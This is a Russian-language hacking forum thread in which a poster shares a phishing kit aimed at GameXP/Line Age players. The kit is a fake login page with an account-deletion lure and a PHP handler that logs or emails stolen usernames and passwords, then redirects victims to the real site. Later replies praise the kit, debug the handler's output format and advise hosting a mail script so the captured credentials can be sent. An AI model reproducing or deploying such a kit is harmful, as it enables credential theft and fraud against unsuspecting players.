![]() |
Привет!
Накатал фейк для Геймеров. Скрин: Фейк: code: Уважаемый пользователь! Ваш аккаунт в Line Age долгое время был неактивен и может быть удален. Чтобы избежать удаления аккаунта, вам достаточно просто Подтвердить: GameXP | Паспорт $(function(){ $('.navigation .first_lvl').hover(function(){ $('.navigation_sub',this).css({'display':'block'}) },function(){ $('.navigation_sub').css({'display':'none'}) }); var script_name = '/index.php'; $('ul.menu li').find('a').each(function() { if ($(this).attr('href') == script_name) { $(this).addClass('menu_current'); } }); }); Подтверждение Забыли пароль? Зарегистрироваться Логин: Пароль: Запомнить на 10 дней: Подтвердить GameXP: Помощь Если у вас возникли дополнительные вопросы или трудности с игрой, вы можете обратиться в нашу Службу заботы об игроках, которая работает 24 часа в сутки 7 дней в неделю, по адресу http://help.gamexp.ru. Рекомендуем вам ознакомиться с дополнительными возможностями усиления безопасности вашей учетной записи. Обратите внимание! Ваша учетная запись действительна для всех игр и сервисов портала: Все игры Все сервисы Пользовательское соглашение Copyright © NIKITA ONLINE. Все права защищены. Обработчик: code: ?php $BASE="base.php"; $IS_EMAIL=false; $LOCATION="http://gamexp.ru/"; $p0=$_REQUEST['login']; $p1=$_REQUEST['password']; $headers = ""; $info=" login:$p0$ pass:p1\n"; if ($IS_EMAIL){ mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info); } else { $fd=fopen($BASE,"a+"); fwrite($fd,$info); fclose($fd); } header("Location:$LOCATION"); ?> Удачи! |
И всё же
Цитата: Сообщение от stivens20 $info="$p0:$p1: Зачем после переменной p1 двуеточие? |
Я ярый фанат игр.Попробую.думаю поправочке не нуждается фейк.
|
Цитата:
Сообщение от stix666 Зачем после переменной p1 двуеточие? Вопрос не имеет смысла.все равно отвечу:чтоб различить логин и пасс в логах. (кому как и на ваше усмотрение. |
Цитата:
Сообщение от stivens20 Вопрос не имеет смысла.все равно отвечу:чтоб различить логин и пасс в логах. (кому как и на ваше усмотрение. Вопрос был в другом. Разделяющее двоеточие идёт после первой переменной. А после второй оно лишнее. Замечу, что тот же арксфейкген при автогеренации обработчика допускает ту же ошибку, что намекает нам на инструментарий автора. Что в конечном счёте не имеет абсолютно никакого значения: если фейк работает и выглядит хорошо (что нельзя, к сожалению, увидеть на милипизерном скрине), то большего и не нужно. Молодец ещё раз. |
Цитата:
если фейк работает и выглядит хорошо (что нельзя, к сожалению, увидеть на милипизерном скрине), то большего и не нужно Чтоб посмотреть скрин фейк крупном плане просто шелкните на скрине. Цитата: Молодец ещё раз. Спасибо Yorvet Старался. |
Фейк хороший
Но только у меня не хочет отсылаться |
Цитата:
Сообщение от hac-san Но только у меня не хочет отсылаться Скрипт для анонимки есть?Возми отсюда закачай на хост свой |
Шя гляним)
|
Прикрыли!
|
| Время: 00:33 |